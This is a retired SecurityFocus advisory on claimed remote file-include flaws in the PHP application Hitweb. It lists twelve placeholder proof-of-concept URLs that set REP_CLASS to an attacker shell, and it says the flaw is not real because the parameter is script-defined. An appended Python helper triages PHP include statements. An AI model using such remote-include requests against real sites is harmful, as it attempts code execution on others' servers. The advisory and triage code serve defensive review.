source: https://www.securityfocus.com/bid/20060/info

Hitweb is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.

This BID is being retired. The specified parameter is defined and cannot contain an attacker-specified value.

http://www.example.com/[path]/index.php?REP_CLASS=[shell]
http://www.example.com/[path]/arbo.php?REP_CLASS=[shell]
http://www.example.com/[path]/framepoint.php?REP_CLASS=[shell]
http://www.example.com/[path]/genpage.php?REP_CLASS=[shell]
http://www.example.com/[path]/lienvalider.php?REP_CLASS=[shell]
http://www.example.com/[path]/appreciation.php?REP_CLASS=[shell]
http://www.example.com/[path]/partenariat.php?REP_CLASS=[shell]
http://www.example.com/[path]/rechercher.php?REP_CLASS=[shell]
http://www.example.com/[path]/projet.php?REP_CLASS=[shell]
http://www.example.com/[path]/propoexample.php?REP_CLASS=[shell]
http://www.example.com/[path]/refererpoint.php?REP_CLASS=[shell]
http://www.example.com/[path]/top50.php?REP_CLASS=[shell]
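
The retirement note turns on whether REP_CLASS is assigned by the script before it reaches an include statement. The following Python triage helper is an added example, not Hitweb code and not part of the original advisory; it applies that check to PHP source. The PHP fragments are constructed, and the function name `triage` and the verdict strings are hypothetical.

```python
import re

# include/require statement whose path expression uses a PHP variable.
INCLUDE_RE = re.compile(r'\b(?:include|require)(?:_once)?\b[^;]*?\$(\w+)', re.I)
# Plain assignment "$name = expr" (the lookahead skips "==").
ASSIGN_RE = re.compile(r'\$(\w+)\s*=(?!=)\s*([^;]*)')
# Superglobals that carry request data.
TAINT_RE = re.compile(r'\$_(?:GET|POST|REQUEST|COOKIE)\b')

VERDICTS = {"script": "defined-by-script", "request": "request-controlled"}

def triage(php_source):
    """Return (line_no, variable, verdict) for each variable-based include.

    Single-file, top-to-bottom heuristic: only the first variable in the
    include expression is checked, and branches/functions are not modelled.
    """
    origin = {}      # variable name -> "script" or "request"
    findings = []
    for line_no, line in enumerate(php_source.splitlines(), 1):
        inc = INCLUDE_RE.search(line)
        if inc:
            var = inc.group(1)
            if TAINT_RE.search(line):
                verdict = "request-controlled"
            else:
                # Never assigned: settable from the query string only when
                # register_globals is enabled.
                verdict = VERDICTS.get(origin.get(var), "uninitialized")
            findings.append((line_no, var, verdict))
            continue
        for name, expr in ASSIGN_RE.findall(line):
            origin[name] = "request" if TAINT_RE.search(expr) else "script"
    return findings

# Constructed PHP fragments (hypothetical, not Hitweb source).
DEFINED = '<?php\n$REP_CLASS = "classes/";\nrequire_once($REP_CLASS . "config.php");\n'
UNINITIALIZED = '<?php\nrequire_once($REP_CLASS . "config.php");\n'
FROM_REQUEST = '<?php\n$REP_CLASS = $_GET["REP_CLASS"];\ninclude($REP_CLASS . "config.php");\n'

if __name__ == "__main__":
    for label, src in [("defined", DEFINED), ("uninitialized", UNINITIALIZED),
                       ("from request", FROM_REQUEST)]:
        print(label, triage(src))
```

A "defined-by-script" verdict corresponds to the situation the retirement note describes; the other two verdicts mark includes that need manual review.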